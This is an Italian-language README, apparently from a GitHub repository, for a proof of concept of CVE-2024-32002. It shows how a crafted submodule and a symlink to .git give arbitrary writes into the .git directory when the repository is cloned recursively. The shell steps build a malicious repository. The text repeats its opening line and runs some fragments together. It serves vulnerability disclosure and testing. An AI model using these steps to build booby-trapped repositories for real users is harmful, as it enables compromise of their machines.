
Un POC per CVE-2024-32002 che dimostra la scrittura arbitraria nella directory .git.
Una POC per CVE-2024-32002 che dimostra la scrittura arbitraria nella directory .git.
Vedi cve-2024-32002-submodule-aw per il repository del sottomodulo correlato.
.git..gitmodules che definisce il sottomodulo malevolo.Questo repo è stato creato su Linux (WSL2, per la precisione). Questo è importante: il repo malevolo può essere creato solo su un filesystem case-sensitive.
ln -s .git submodule
Note:
git submodule add --name aw https://github.com/JakobTheDev/cve-2024-32002-submodule-aw.git Submodule/notexists
Note:
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-aw.git